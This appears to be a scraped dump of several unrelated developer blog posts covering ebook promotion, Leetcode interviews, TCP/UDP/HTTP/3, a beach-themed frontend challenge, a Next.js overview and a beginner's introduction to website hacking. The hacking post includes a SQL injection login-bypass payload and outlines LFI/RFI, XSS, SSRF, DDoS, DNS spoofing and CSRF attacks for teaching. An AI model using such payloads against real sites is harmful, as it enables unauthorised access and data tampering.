The length of the string is always less than or equal to the capacity of the builder. The length is the actual size of the string stored in the builder, and the capacity is the current size of the builder. The builder’s capacity is automatically increased if more characters are added to exceed its capacity. Internally, a string builder is an array of characters, so the builder’s capacity is the size of the array. If the builder’s capacity is exceeded, the array is replaced by a new array. The new array size is **2 * (the previous array size + 1)**.
You can use **new StringBuilder(initialCapacity)** to create a **StringBuilder** with a specified initial capacity. By carefully choosing the initial capacity, you can make your program more efficient. If the capacity is always larger than the actual length of the builder, the JVM will never need to reallocate memory for the builder. On the other hand, if the capacity is too large, you will waste memory space. You can use the **trimToSize()** method to reduce the capacity to the actual size. | paulike |
1,879,686 | How to promote your ebooks with your website? | I’m a web developer by trade and a part-time author, so here are a few things that I have done to... | 0 | 2024-06-12T16:34:36 | https://www.csrhymes.com/2024/06/06/promoting-your-ebooks-with-your-website.html | writing, marketing, webdev | ---
title: How to promote your ebooks with your website?
published: true
date: 2024-06-06 00:00:00 UTC
tags: writing,marketing,webdev
canonical_url: https://www.csrhymes.com/2024/06/06/promoting-your-ebooks-with-your-website.html
cover_image: https://www.csrhymes.com/img/books-hero.jpg
---
I’m a web developer by trade and a part-time author, so here are a few things that I have done to help promote my books and ebooks using my website and my tech know how from my day job.
## Build a website
If you don’t have a website, then start by building one. Easy huh?
At the very least, start with a single landing page so you have a presence on the internet when people search for your name or book title. From here you can direct people to where your book is sold and your social media sites so people can be kept up to date.
I built a website, this website in fact, partly to promote my books, partly to promote my work.
This site is built using [Bulma-Clean-Theme](https://github.com/chrisrhymes/bulma-clean-theme), a Jekyll theme that includes product listing pages that you can use to promote your books. If you are interested in development then this may be a way for you to go, but if you aren’t then take a look at site builders or something in between such as WordPress.
The biggest benefit to me of using Jekyll is that I can host it for free with [GitHub pages](https://pages.github.com/) or [Netlify](https://www.netlify.com/), whereas site builders normally come at a monthly cost. There is also no hassle with maintaining a web server as it is a static site. This means the HTML pages are generated into static HTML files and deployed somewhere, in my case GitHub Pages. The way I see it, if you are able to save some money on your website, then you have more to spend elsewhere.
Do what works for you. Pick a solution that is easiest for you to maintain and update, that way, you won’t be put off from making regular updates to your site and it will become part of your routine. Updating little and often, rather than overhauling everything every couple of years, is generally better as return visitors will be encouraged to come back more often and see what is new.
## Register a domain name
Once you have your site up and running you need to register a domain name for your website and point it at your new website. Ensure that you own the domain name and not a third party, such as a developer or an agency.
You also want to ensure that you can update your domain name settings so you can point it somewhere else in future, such as to a different website host, if you want to move your website. You don’t want to be stuck and have to buy a new domain in future and have to start all over again.
Your domain should be concise and easy to type in the address bar. This makes it easier for return visitors to check back at a later date without having to rely on a search engine.
## Create a blog
I’ve found that a good way of getting visitors to your new site is to create a blog. Like this one! Most of the traffic to my website comes from the blog posts. Once people land on your site they can look around and see what else is on your site.
You can always link to your [books](https://www.csrhymes.com/books) from your blog post (see what I did there) which will help visitors to your blog post find your books.
I have heard people say they want a blog, but then I ask them what are they going to write about. They create a single post and then never use it again. I’d suggest writing a list of possible blog post topics and pick the one that you are most excited to write about. If you are excited to write about it then others will be excited to read about it.
Every time you have a new idea for a blog post, ensure you write it down somewhere, otherwise when it actually comes to writing the post, you will be sat in front of an empty screen whilst you try to remember what your great idea was. I use the notes app on my phone to keep my list.
## Add interesting titles and meta description tags to your pages
Spend some time thinking about the title and meta description for your page. These appear in the `<title>` tag and `<meta name=“description”>` tag in the `<head>` part of the HTML. This is normally used by search engines results so this is what people that find your site see, so it needs to encourage people to click on that result instead of one of the other links.
Take a look at some best practices for descriptions on the [Google Search documentation](https://developers.google.com/search/docs/appearance/snippet#meta-descriptions).
The tile is also used when sharing your link on social media sites. You can go one step further for social media and add additional tags specific to Facebook and X (formerly Twitter), known as [OpenGraph](https://ogp.me/).
I use the Jekyll SEO tag plugin to automatically generate the meta tags for my site, but there are also plugins for WordPress to help you generate these tags.
## Tell Google and other search engines
You may be lucky and a search engine may stumble upon your website, but why not give it a head start and tell search engines it exists. This can be done through [Google Search Console](https://search.google.com/search-console/about). You provide the url of your site and then verify that you own it, either through adding a meta tag to the code, uploading a file, through Google Tag manager or Google Analytics, or by adding a DNS record. Sounds complicated, but it’s definitely worth doing.
Once you have verified you own the site, you can then submit your sitemap. The sitemap tells Google about all of your site’s pages so it knows they exist and can then crawl the pages and then display them in search results.
So what is a [sitemap](https://developers.google.com/search/docs/crawling-indexing/sitemaps/build-sitemap)? It’s an XML file in a particular format that provides a list of your websites pages. Jekyll and WordPress have plugins to create a sitemap for you so you don’t have to manually write out a load of XML and keep it updated.
Each time you add a new page, such as when a new book page or a new blog post is added, it is added to your sitemap and Google should then index the page next time it reads your sitemap.
## Add your website address to your social media profiles
People looking at your posts and profile will want to know more about you, so provide them with a link in your profile back to your website. This is especially useful if the social media site shows your public profile to search engines. Each link back to your site helps boost its rankings in search engines.
## Share your blog posts on social media
When you have spent so much time writing a blog post, ensure you share it with others. One thing that caught me out, but is probably obvious to most users these days, is that some social sites don’t allow links. Instagram is one example of this. So maybe concentrate on X (formerly Twitter), Facebook, LinkedIn and Threads for sharing links.
## Sharing to other sites
I first got real traction for my blog posts after sharing to another site, who then promoted my blog post for me. In my case, the posts I tend to write are about my day job as a web developer using Laravel and JavaScript. I discovered Laravel News, which allows you to submit your links to their site.
Approved links then get published to a [Community Links](https://laravel-news.com/links) section on their site, but even more importantly, they also share the links on their social media profiles too, as well as sharing the links in a weekly email to their large subscriber base.
Remember to pick sites that are relevant to your subject matter to share to, so don’t submit non Laravel related blog posts to Laravel News.
I am still looking for a site that allows authors to share their blog posts with other authors and readers. If you are aware of one then please let me know!
## Share your blog’s RSS feed
Most blogs allow you to generate an XML feed that can be read by other sites to provide links back to your site. Again, for Jekyll, there is a plugin that lets you create a feed for your posts and WordPress has it as a default feature.
As a developer, I found [dev.to](https://dev.to/chrisrhymes), which allows you to import posts from your website’s feed. The added bonus of this is that it sets a tag telling search engines that the post was originally created on your website. This is called a [canonical link](https://developers.google.com/search/docs/crawling-indexing/consolidate-duplicate-urls#rel-canonical-link-method) and helps tell search engines where the content originally came from.
[Medium.com](https://medium.com/@chrisrhymes) also allows you to import posts from my website’s RSS feed, again with a canonical link pointing back to your website.
## Tell people about your site and your books
Last but not least, tell people in real life. I have to admit I am terrible at this. I have found that your website and blog will quietly sit there unused unless you go out of your way to tell people about it.
You should be proud of what you do and want others to read about it.
Add your website address to your business cards, email signature, wherever you can think of.
## Hope that helps
Hopefully there are lots of ideas there to get you started and give your website and blog a boost to help give your books some more visibility.
If you have found this article useful then check out “[How NOT to make a Website](/products/how-not-to-make-a-website)” by C.S. Rhymes for more information on what not to do when building a website. | chrisrhymes |
1,879,787 | I Am So Sick of Leetcode-Style Interviews | I quit my previous job at Robinhood in late November of 2023 mainly for health reasons. I've been in... | 0 | 2024-06-07T02:47:20 | https://nelson.cloud/i-am-so-sick-of-leetcode-style-interviews/ | career, opinion, rant | ---
title: I Am So Sick of Leetcode-Style Interviews
published: true
date: 2024-06-06 00:00:00 UTC
tags: #career, #opinion, #rant
canonical_url: https://nelson.cloud/i-am-so-sick-of-leetcode-style-interviews/
---
I quit my previous job at [Robinhood](https://robinhood.com/) in late November of 2023 mainly for health reasons. I've been in various interviews since then. Things have fallen off for one reason or another but I just gotta say...I am getting so tired of [Leetcode](https://leetcode.com/problemset/)-style interviews, especially since I know they don't reflect the actual responsibilities of software engineering.
It seems like most (if not all) companies do these kinds of interviews simply because that's what all the big companies do, like Google, Facebook/Meta, Amazon, and so on.
I've had very bright engineers tell me that I shouldn't memorize things that I can easily Google. But yet, these interviews quiz me on things that I can easily Google but I may not know off the top of my head. It's absurd.
I don't really have a solution to this problem, I just know it's a problem.
And I'm sick of it.
If you need a Software Engineer with AWS, Kuberentes, and Ruby on Rails experience, and you don't do silly quizzes, feel free to reach out!
* * *
Discussion over at [Hacker News](https://news.ycombinator.com/item?id=40571395) | nelsonfigueroa |
1,878,585 | A Beginner's Guide to Networking Protocols: TCP, UDP, HTTP, and HTTP/3 | Networking can feel like a maze of jargon and acronyms, but understanding the basics is essential for... | 0 | 2024-06-05T23:57:46 | https://dev.to/dev_ojay/a-beginners-guide-to-networking-protocols-tcp-udp-http-and-http3-3pp6 | http, tcp, udp, networking | Networking can feel like a maze of jargon and acronyms, but understanding the basics is essential for anyone new to programming and IT. Two fundamental protocols you'll encounter are [TCP and UDP](https://medium.com/@abhirup.acharya009/understanding-tcp-and-udp-building-blocks-of-connectivity-ec96e208b852), and it's important to know how HTTP uses them. Let's break down these protocols in a simple and easy-to-understand way.
###TCP: The Reliable, Connection-Oriented Protocol
TCP stands for **Transmission Control Protocol.** Think of it as the reliable delivery service of the internet. When you send data using TCP, you’re ensuring it arrives intact and in order. Here’s why TCP is so dependable:
1. **Connection-Oriented**: TCP establishes a connection between the sender and receiver before data transmission begins. Imagine calling someone before having a conversation.
2. **Reliable Delivery**: TCP ensures all packets of data reach their destination. If some packets go astray, TCP retransmits them.
3. **Orderly Data Transfer**: TCP guarantees that packets arrive in the order they were sent. It’s like receiving the pages of a book in the correct sequence.
### How Does TCP Work?
When you send a message using TCP, it goes through a series of steps known as the **TCP handshake**:

1. **SYN**: The sender sends a synchronization packet to the receiver.
2. **SYN-ACK**: The receiver acknowledges this by sending back a synchronization acknowledgment packet.
3. **ACK**: The sender responds with an acknowledgment packet, establishing a connection.
This three-step handshake sets up a reliable channel for data transfer. TCP is like having a polite and precise conversation, ensuring everyone is on the same page before diving into the details.
### UDP: The Unreliable, Connectionless Protocol
UDP, or **User Datagram Protocol,** is the "fast and loose" counterpart to TCP. It's used when speed is more critical than reliability. Here’s what makes UDP different:
1. **Connectionless**: UDP sends data without establishing a connection first. It’s like sending a letter without expecting a reply.
2. **Unreliable Delivery**: There’s no guarantee that the data packets will arrive at their destination or in the correct order. It’s a bit like sending postcards into the wind.
3. **Faster Transmission**: Because it skips the connection and error-checking steps, UDP can transmit data faster than TCP.
#### How Does UDP Work?
With UDP, data packets (called datagrams) are sent out into the network with minimal overhead. This makes it ideal for applications where speed is crucial, and some data loss is acceptable. For example:
- **Streaming Media**: If a few video frames are dropped, it’s usually not noticeable.
- **Online Gaming**: Faster data transmission is often more important than perfect delivery.
### How Does HTTP Use TCP?
1. **Establishing a Connection**: When you type a URL into your browser, it initiates a TCP connection to the server where the website is hosted.
2. **Request and Response**: Your browser sends an HTTP request (like asking for a web page), and the server responds with the requested data using TCP. This ensures that the data (text, images, videos) arrives reliably and in the correct order.
3. **Closing the Connection**: Once the data transfer is complete, the TCP connection is closed.
Using TCP for HTTP ensures that the web pages you request are delivered accurately and completely, making your browsing experience smooth and reliable.
###How Does HTTP Use UDP in HTTP/3?
[HTTP/3](https://www.cloudflare.com/learning/performance/what-is-http3/) is the latest version of the HTTP protocol, using QUIC (Quick UDP Internet Connections), which is built on top of UDP. This improves performance and speed, especially in our modern age where users frequently switch between networks on their smartphones.
Here's how it works:
1. **Faster Connection Establishment:** QUIC, and by extension HTTP/3, reduces the time needed to establish a connection compared to TCP. This makes web pages load faster.
2. **Reliability and Order:** Despite being built on UDP, QUIC incorporates mechanisms for ensuring data reliability and ordered delivery, similar to TCP but with lower latency.
3. **Improved Performance:** HTTP/3 can handle packet loss more efficiently and maintain better performance on unstable networks.
By leveraging UDP through QUIC, HTTP/3 aims to enhance the speed and efficiency of web communication without sacrificing reliability.
### Wrapping Up
Understanding TCP and UDP, and how HTTP and HTTP/3 use these protocols, is a crucial step in grasping the fundamentals of networking. Remember:
- **TCP** ensure data arrives intact and in order.
- **UDP** prioritizes speed over reliability.
- **HTTP** leverages TCP to ensure web pages are delivered reliably.
- **HTTP/3** leverages QUIC to ensure fast connection and reliability.
As you learn more about networking and programming, these ideas will help you understand more advanced topics.
| dev_ojay |
1,878,584 | Dev.to Frontend Challenge: Take me to the Beach | Dev.to Frontend Challenge June This project it will be used for the dev.to frontend... | 0 | 2024-06-05T23:55:33 | https://dev.to/kevin-uehara/devto-frontend-challenge-take-me-to-the-beach-4agn | frontendchallenge, braziliandevs, javascript, webdev | ## Dev.to Frontend Challenge June
This project it will be used for the dev.to frontend challenge. I choose the second challenge: the beaches.
Just Access the Project: [Hosted Project](https://devto-frontend-challenge-june.vercel.app/)
## Github Repository
[Repository](https://github.com/kevinuehara/devto-frontend-challenge-june)

## How it works?
I'm using the Vanilla Javascript and the mock API to provide the images and the lat/long. And with the coordinates I'm using Leaflet to display the map location of the beach.
I'm not using NPM/Yarn/PNPM as dependency package manager. This project is a simple project using vanilla javascript and using all the functions to replace and manipulate the DOM, just using javascript.
All styles is a simple file of CSS.
For the fonts I'm using the Google Fonts.
Also, is responsive, with accessibility, performance and Best SEO!
## How to run?
Just use the Live Server of VS Code extension. Click on HTML file with the right button of the mouse and click on `Open Live Server`. Access the `http://localhost:5501/index.html`.
This project is hosted on Vercel. Just access the `https://devto-frontend-challenge-june.vercel.app/`
## Light House Metrics

| kevin-uehara |
1,878,583 | Day 964 : Energy Boost | liner notes: Professional : Had a couple of meetings. Responded to community questions. Rest of the... | 0 | 2024-06-05T23:53:11 | https://dev.to/dwane/day-964-energy-boost-2hp8 | hiphop, code, coding, lifelongdev | _liner notes_:
- Professional : Had a couple of meetings. Responded to community questions. Rest of the day, I worked on the library I published yesterday and got it working in a demo application. Pretty good day.
- Personal : Last night, I went through some tracks for the radio show. Worked on my side project. Didn't get much done. CSS was kicking my butt! haha I'm almost there. Trying to get the selection of an element previous to the active one. Got tired and went to sleep.

Don't know what it is. Think I'm sick. Got a sore thought and bad cough every once in a while and just been super tired after work. Been getting started on my side project later than normal. I did set up my new AR glasses so that's pretty cool. There's some more apps I want to download to test some things out, but so far so good. I'm tired! Need an energy boost. Going to go through some tracks on Bandcamp to purchase. Work on the radio show. See if I can get this CSS worked out. I think I'm so close. I'm learning a lot though. Then call it a night.
Have a great night!
peace piece
Dwane / conshus
https://dwane.io / https://HIPHOPandCODE.com
{% youtube dE3gl0afQlw %} | dwane |
1,875,922 | 🎬 From image to text data... to image...to movie clip. | 📰 About I previously wrote an article that showed, how, for totally free of charge, and... | 27,429 | 2024-06-05T23:51:02 | https://dev.to/adriens/from-image-to-text-data-to-imageto-movie-clip-10ci | showdev, datascience, ai | ## 📰 About
I previously wrote an article that showed, how, **for totally free of charge, and with 100% open source software,** it is possible to analyze photos and produce textual analysis:
{% embed https://dev.to/adriens/disaster-reporting-wopen-source-llavaai-for-photo-analysis-4k4c %}
👉 Today, I'll show, what can be achieved on top of these textual analysis.
## 📜 What we'll do
This time, we will enrich the previous pipeline with the following workflow:
1. **🎨 `text2img`**: inject text analysis into an image with https://ideogram.ai
2. **🎬 `img2video`** : Put resulting image into [Gen-2 by Runway](https://research.runwayml.com/gen2) to get a movie clip with
3. 🎙️ Prepare a small **storytelling**
4. 🎶 Select a **soundtrack**
5. 🎛️ Put all the stuff into a single **short movie clip**
Enough talk, here is the resulting movie clip.
## 🎞️ Demo
{% youtube vb66lFI1U2Q %} | adriens |
1,878,582 | INTRODUCTION TO WEBSITE HACKING | SQL Injection SQL Injection is a malicious web vulnerability, a dark art that allows... | 0 | 2024-06-05T23:47:14 | https://dev.to/sam15x6/introduction-to-website-hacking-4g48 | hacker, sql, python, webdev | ## SQL Injection
**SQL Injection** is a malicious web vulnerability, a dark art that allows attackers to manipulate the very heart of your application – its database. By interfering with the queries your application makes, attackers can view, modify, or even delete your precious data. And if that's not enough, they might even be able to take full control of your application, leaving you with a smoldering mess.
Comments in SQL programming, those quiet little notes developers leave in the code, can become weapons in the hands of these attackers. Ignored by the compiler or interpreter, comments usually go unnoticed, but in the wrong hands, they can be used to exploit vulnerabilities and wreak havoc.
Take a look at this innocent-looking code snippet:
```sql
SELECT * FROM users WHERE username = 'admin'-- 'AND password = 'haha';
```
Here, the attacker has added a comment `--` to bypass the password check, effectively granting them access with just the username. It's a simple yet powerful technique, and there are many more like it in the SQL Injection Payload List on GitHub. A treasure trove of malicious techniques awaits at: https://github.com/payloadbox/sql-injection-payload-list
## Local File Inclusion (LFI) & Remote File Inclusion (RFI)
Now, let's move on to another devious trick up an attacker's sleeve: Local File Inclusion (LFI). With LFI, attackers trick the server into including local files stored on it. This gives them access to sensitive files and sometimes even lets them execute their own code. It's like giving a burglar the keys to your house and showing them where you hide your valuables.
Websites that dynamically include files based on user input are particularly vulnerable to LFI attacks, especially if they don't sanitize and validate that input properly. Content management systems, forums, and web applications with file inclusion features are common targets for these malicious intruders.
But wait, there's more! Remote File Inclusion (RFI) takes it a step further. With RFI, attackers include files from external sources, executing malicious code hosted on their own servers. It's like letting the burglar bring their own tools to break into your safe.
## The Many Faces of Website Defacement
Website defacement, the act of altering a website's content or appearance without authorization, is a common goal of attackers. Here are some of the ways they can achieve this:
1. **Admin Login Pages:** Locating the admin login portal and gaining unauthorized access to alter website content.
2. **LFI/RFI:** Including and executing local or remote files to inject malicious scripts or replace files, ultimately changing website content.
3. **SQL Injection:** Injecting malicious SQL commands to modify or delete database entries, thereby altering website content.
4. **Cross-Site Scripting (XSS):** Injecting malicious scripts into web pages viewed by users, displaying altered content or redirecting them to malicious pages.
5. **Server-Side Request Forgery (SSRF):** Exploiting internal services and making the server perform unauthorized requests to gain control and modify website content.
6. **DDoS Attack:** Overloading a website with traffic to make it unavailable, indirectly affecting site functionality.
And there's more where that came from. Server-Side Template Injection (SSTI) and Directory Traversal are just a couple of other tricks attackers use to manipulate website content and execute server-side commands.
## Attacks Targeting Visitors, Not Websites
Not all attacks are aimed at defacing websites. Some target the visitors themselves:
1. **DNS Spoofing (DNS Cache Poisoning):** Altering DNS records to redirect unsuspecting users from a legitimate site to a malicious one.
2. **Cross-Site Request Forgery (CSRF):** Tricking authenticated users into performing actions on a web application without their consent, such as transferring money to an attacker's account.
The world of website hacking is a treacherous one, full of pitfalls and dangers. But fear not, for knowledge is power. By understanding these threats, we can fortify our defenses and keep our digital kingdoms safe.
And if you're feeling adventurous, you can even set up your own vulnerable website to practice your hacking skills. Just remember, with great power comes great responsibility. Use these skills wisely, young padawan. | sam15x6 |
1,878,581 | What Is Next Js And Why Should You Use It In 2024? | INTRODUCTION One of the top benefits of learning what is Next.js, is the knowledge of how flexible... | 0 | 2024-06-05T23:45:08 | https://dev.to/basimghouri/what-is-next-js-and-why-should-you-use-it-in-2024-5ei9 | javascript, nextjs, beginners, webdev | **INTRODUCTION**
One of the top benefits of learning what is Next.js, is the knowledge of how flexible you can become in building, and adapting to online reality.
As seasoned Next.js developers, we recognize the immense value in mastering this framework. One of its most compelling advantages lies in its unparalleled flexibility, empowering us to craft and seamlessly adapt to the dynamic landscape of the online realm.
Within our realm as providers of Next.js development services, we view this flexibility as a cornerstone in navigating the swiftly evolving digital sphere. It affords us the agility to swiftly iterate and experiment with our concepts, enabling us to promptly respond to market demands and technological advancements. In essence, it allows us to stay ahead of the curve and maintain a competitive edge.
Moreover, the current landscape of consumer behavior has undergone a seismic shift, presenting new challenges and opportunities. With the rise of e-commerce and changing consumer habits, the need for adaptable and innovative solutions has become more pressing than ever before.
We became much more demanding when it comes to page loading speed (in milliseconds!) and the user experience from using websites or web shops.
Our expectations regarding page loading speed, measured in milliseconds, and the overall user experience while navigating websites or online stores have significantly heightened.
It allows you to build both simple and complex web applications much faster, and easier, and thanks to many great frameworks that have grown upon it, you can now build blazingly fast websites to achieve a much better UX and SEO efficiency.
Let’s have a look at one of those frameworks — Next.js, which enjoys growing popularity and quickly became the first choice for many big names and companies.
**# WHAT IS NEXT.JS?**
Next.js is a JavaScript framework that enables you to build superfast and extremely user-friendly static websites, as well as web applications using React.
In fact, thanks to [**Automatic Static Optimization**](https://nextjs.org/docs/pages/building-your-application/rendering/automatic-static-optimization), “static” and “dynamic” become one now.
This feature allows Next.js to build hybrid applications that contain both server-side rendered and statically generated pages.
In other words,
> Statically generated pages are still reactive: Next.js will hydrate your application client-side to give it full interactivity.
This opens us many advantages like:
- **Rich User Experience** (easier and faster)
- **Great performance** (also easier and faster)
- **Rapid feature development**
Next.js is widely used by the biggest and most popular companies all over the world like Netflix, Uber, Starbucks, or Twitch. It’s also considered as one of the fastest-growing React frameworks, perfect to work with static sites — which was the hottest topic in the web development world lately.
**What is Next.js — A 2024 Perspective**
In recent years, Next.js has witnessed a huge rise in popularity.

According to the Stack Overflow survey of 2023, it ascended from the 11th to the 6th most popular framework among web developers. This rapid growth underscores its increasing acceptance and effectiveness in the developer community.

Over the years, Next.js has continually evolved, introducing features that address the ever-changing environment of web development. Its updates have consistently focused on imrpoving performance, developer experience, and providing robust SEO capabilities.
**Next.js 14 — A Leap Forward**
Next.js 14, introduced by Lee Robinson and Tim Neutkens, marked a significant advancement in the framework’s capabilities, building upon the foundations laid by Next.js 13:
- **Turbopack**: Replaces Webpack for faster builds, offering significantly quicker server start-up and refresh rates. These changes lead to higher developer productivity and faster iteration cycles, crucial for large-scale applications.
- **Server Actions (Stable)**: Streamlines server-side logic, allowing functions to run securely on the server. This simplifies data mutation workflows and strenghten application security, particularly vital for handling sensitive data and complex state management scenarios.
- **Partial Prerendering (Preview)**: Merges the benefits of SSR, SSG, and ISR, enabling rapid initial static loading with dynamic content streaming. This is key for applications requiring both fast loading times and dynamic content rendering.
- **Metadata Improvements**: Automates the inclusion of essential metadata in the initial page load, ensuring a seamless user experience across devices and themes. It’s especially important for responsive design and accessibility.
> Next.js 14 brought some game-changing features. Turbopack, for instance, has significantly sped up server startup and code refresh times. Then there’s Server Actions, making mutations more efficient and integrated. And let’s not forget Partial Prerendering, which is still in preview but looks promising for dynamic content handling.
The features introduced in Next.js 14 represent significant advancements in the capabilities of the framework, catering to various aspects of web development and addressing key challenges faced by developers. Let’s delve into each of these features and explore their benefits in more detail:
**React Server Components (RSC):**
- Performance Optimization: By rendering components server-side and accessing the backend directly, RSC reduces the client-side bundle size and enhances performance.

- Improved Initial Load Times: With reduced initial load times, RSC contributes to a smoother user experience, especially for applications with extensive client-side rendering requirements.
- SEO Benefits: Server-side rendering improves SEO capabilities by providing search engine crawlers with pre-rendered HTML content, enhancing discoverability and search ranking.
**Middleware:**
- Granular Control: Middleware empowers developers with fine-grained control over the request-response lifecycle, facilitating advanced server-side logic such as A/B testing and request manipulation.

- Customized User Experience: With the ability to manipulate requests and responses at various stages, developers can tailor the user experience based on specific criteria, enhancing personalization and engagement.
- Efficient Implementation of Complex Logic: Middleware streamlines the implementation of complex server-side logic, enabling developers to manage application behavior more efficiently and effectively.
**Edge Functions:**
- Minimized Latency: By executing server-side code at the network’s edge, Edge Functions minimize latency and offer a serverless experience, ensuring optimal performance for users across diverse geographical locations.
- High Performance: Applications requiring high performance and low response times benefit significantly from Edge Functions, delivering faster and more responsive user experiences.
- Global Scalability: Edge Functions enable global scalability by distributing server-side logic closer to end-users, reducing the impact of geographical distance on application performance.
**App Router:**
- Advanced Routing Features: The revamped routing system in Next.js, including support for nested routes and layouts, offers developers more flexibility and power in structuring applications.
- Scalability and Maintainability: For large-scale and complex web projects, App Router provides a structured approach to managing routing logic, enhancing scalability and maintainability.
- Improved Developer Productivity: With a more intuitive and feature-rich routing system, developers can streamline development workflows and accelerate the implementation of routing-related features.
Overall, the features introduced in Next.js 14 represent a significant leap forward in empowering developers to build high-performance, scalable, and feature-rich web applications. Whether it’s optimizing performance, customizing user experiences, reducing latency, or enhancing routing capabilities, Next.js 14 offers a comprehensive toolkit for tackling the challenges of modern web development effectively.
**NEXT.JS AND JAMSTACK**
Next.js is now one of the most popular React frameworks for building superfast, and super SEO-friendly [Jamstack websites](https://pagepro.co/services/jamstack-development).It can be perfectly combined with headless CMSes, or eCommerce platforms to drive extraordinary performance and SEO results.
**WHAT CAN YOU BUILD WITH NEXT.JS?**

With Next.js you can build a number of digital products and interfaces such as:
- Web Platform
- Jamstack websites
- MVP (Minimum Viable Product)
- Static websites
- Single web pages
- SaaS products
- eCommerce and retail websites
- Dashboards
- Complex and demanding web applications
- Interactive user interfaces
And we love to use it in various projects since it gives us so many possibilities. Check out how it influenced the e-learning platform we were recently launching for our customer — Learn Squared:
**Our Choice: Why We Chose Next.js for Our Website**
At the heart of our decision to use Next.js for our website lies a combination of strategic factors and practical benefits.
**SEO Optimization** stands out as a primary reason — we work on SEO improvements daily, as organic is our main source of traffic. Next.js’s powerful SEO capabilities significantly boost organic traffic, a key metric for online visibility and success.
Equally crucial is **Page Speed** for us. This framework’s efficiency in loading times elevates the user experience and also, again, fortifies our SEO efforts.
In the realm of** Content Management**, using the Jamstack architecture with Next.js has afforded us exceptional flexibility, allowing our marketing team to harness tools like Storybook for dynamic content management.
This aligns perfectly with our approach to content strategy, ensuring that we can adapt and respond swiftly to market trends and user feedback.
Lastly, the **Developer Affinity** for Next.js within our team is noteworthy. Our developers prize its efficiency and scalability, making it a pleasure to work with, while the robust support community around Next.js provides an added layer of assurance and continuous learning.
By adopting Next.js for our own website, we provided final proof of its effectiveness and adaptability in the ever-evolving digital world. (Yes, we love it very much!)
**NEXT.JS AND USER EXPERIENCE**
User experience plays a key role in the success (or failure) of digital businesses.

For example, if you have an online shop and you don’t take care of UX properly, it will result in:
- Losing customers
- Abandoned carts
- High bounce rate
The design is also important — if you are using themes or templates, the chances are someone out there has a similar-looking layout. It also means that you can’t build a unique customer experience and change it over time. Even if this means changing one simple thing like adding a button to the product page or deleting one.
Luckily — thanks to Next.js — you can build a fully customized user experience. Let’s see what it really means.
- **UX Freedom**: Next.js allows developers to bypass the constraints of plugins, templates, or other limitations typically imposed by CMS platforms. Technically, this is facilitated by Next.js’s flexible file-system routing and its support for various CSS-in-JS libraries, enabling a high degree of customization in the frontend design.
- **Adaptability and Responsiveness**: The framework’s built-in features such as automatic image optimization and responsive loading contribute significantly to creating web applications that are adaptable to any screen size or resolution. This adaptability is bolstered by the framework’s seamless integration with modern CSS frameworks,boosting the responsive design capabilities.
- **Short Page Load Time**: Next.js’s capability for static site generation (SSG) and incremental static regeneration (ISR) plays a crucial role in achieving faster page load times. They enable serving pre-rendered pages to users, significantly reducing the time to first byte (TTFB) and repairing the overall site speed.
- **Data Security**: In the context of static websites built with Next.js, the absence of a direct database connection reinforce security. This architectural choice minimizes the exposure of sensitive data and dependencies, making these sites inherently more secure against common web vulnerabilities.

All of these things mentioned above make the user experience as great as it can possibly be.
But the benefits of using Next.js don’t end there.
**NEXT.JS AND SEO**

Another big reason to choose Next.js is its SEO efficiency, and here’s why:
- **Server-Side Rendering (SSR)**: One of the most influential benefits of Next.js is its use of SSR. It ensures that the full content of your page is rendered on the server before it reaches the user’s browser. For search engines, this means they can crawl and index your site content more effectively, boosting your visibility in search results.
- **Static Site Generation (SSG)**: Next.js excels in generating static sites, which are faster and more reliable. Static sites load quicker, offering a better user experience, a factor that search engines, particularly Google, prioritize highly. This directly contributes to better SEO rankings.
- **Speed and Performance**: Next.js websites are known for their impressive speed, a direct result of static generation and optimized code. Fast-loading sites reduce bounce rates, keep users engaged longer, and are favoured by search engines, all contributing to higher SEO rankings.
- **Organic Traffic and High-Intent Keywords**: By optimizing for speed and user experience, Next.js helps in growing organic traffic faster. Its ability to rank high-intent keywords higher than competitors makes it a preferred choice for businesses aiming to be more visible to potential customers.
- **Competitive Edge**: The SEO efficiency of Next.js gives websites a significant advantage over competitors. Its capabilities in speed, performance, and content visibility help sites outperform others in search engine results.
In both cases, it will help you a lot with:
**- Growing organic traffic faster
- Ranking your high-intent keywords higher
- Outperforming competitors easier
- Be more visible to potential customers**
Next.js websites are super-fast, easy to scan, and provide a great user experience and that’s why Google will favour them above others and rank them higher.
**PROS AND CONS OF NEXT.JS**
As with any other framework, some great options come with a price. Let’s have a look at the most popular pros and cons of using Next.js.

**Main Advantages of Next.js for CTOs**
Rich Ecosystem: Next.js benefits from the widespread adoption of JavaScript and strong backing from industry giants like Vercel and Meta. This robust ecosystem offers a rich talent pool and ease of learning, making Next.js a strategic, future-proof choice for tech leaders.
**Future-Proof Technology**: With regular updates and support from a vibrant community and industry leaders, Next.js represents a future-proof solution in web development. Additionally, its alignment with the latest web standards makes it a strategic asset for long-term business goals and technology roadmaps.
**Easy Scalability**: Next.js supports scalability through features like automatic code splitting, flexible rendering options, and optimized image handling. These features ensure efficient resource utilization and performance under high traffic, crucial for rapidly growing businesses.
**High Security**: Offering robust tools for building secure web applications, Next.js addresses critical areas like authentication and data validation. This focus on security is vital for maintaining user trust and data integrity in the face of growing number of cyber threats.
**Performance Optimization**: Key features like lazy loading, image optimization, code splitting, and route prefetching in Next.js positively influence site performance. And these are essential for high user engagement and efficient resource utilization, impacting the success and growth of web applications.
**SEO Optimization**: As we mentioned a few times above, Next.js boosts SEO through server-side rendering, static generation, and incremental static regeneration. It ensures that content is fully accessible to search engine crawlers, supporting site visibility and user traffic.
**Benefits of Next.js for online businesses**
How Next.js can positively impact your business results and help you push your ideas further?
**Faster time to market**: many ready-to-use components and compatibility that come with it make building MVP much faster. Thanks to it, you can get feedback from real users quickly and make proper changes without wasting time and budget.
**Better User Experience**: you have total freedom to create a front-end that fully aligns with your business goals and design vision. Thanks to it, the user experience is great and unique.
**Increased organic traffic**: Google loves static sites as they are fast, light, and easy to scan. This translates into higher positions of these websites in search results.
**Fully omnichannel**: Next.js websites and web apps work on any device, so they are accessible to everyone.
**Support on demand**: since Next.js is a React-based framework, it won’t be difficult to find another [frontend developer](https://pagepro.co/services/frontend-development) without a need to build everything from scratch once again.
**Increased conversion rate**: fast loading speed, better user experience and high accessibility convert into a higher conversion. If the users are happy with the customer experience they got, they are more likely to buy and come back later for more.
**Community support**: as Next.js is becoming a number one framework for many big brands, it’s becoming more famous, and naturally, so the number of its contributors. That means, even if you face any issue, there will be probably a solution for that already.
**Pros of Next.js for developers**
Regardless of whether you are looking for benefits from a business perspective or a technical one, you will find some reasons to seriously consider choosing Next.js.

